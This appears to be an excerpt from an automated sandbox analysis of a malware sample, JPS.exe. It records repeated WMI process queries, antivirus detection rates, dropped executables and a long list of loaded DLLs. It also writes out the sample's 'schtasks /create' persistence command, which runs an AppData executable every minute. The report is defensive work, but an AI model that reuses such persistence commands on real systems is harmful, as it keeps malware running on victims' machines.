                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Users\user\Desktop\JPS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: JPS.exeVirustotal: Detection: 85%
                              Source: JPS.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\Desktop\JPS.exeFile read: C:\Users\user\Desktop\JPS.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\JPS.exe "C:\Users\user\Desktop\JPS.exe"
                              Source: C:\Users\user\Desktop\JPS.exeProcess created: C:\Users\user\Desktop\._cache_JPS.exe "C:\Users\user\Desktop\._cache_JPS.exe"
                              Source: C:\Users\user\Desktop\JPS.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: C:\Users\user\Desktop\._cache_JPS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\._cache_JPS.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                              Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7604 -s 3432
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                              Source: C:\Users\user\Desktop\JPS.exeProcess created: C:\Users\user\Desktop\._cache_JPS.exe "C:\Users\user\Desktop\._cache_JPS.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbsJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: shacct.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: twinapi.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: idstore.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: wlidprov.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: provsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: winmm.dllJump to behavior
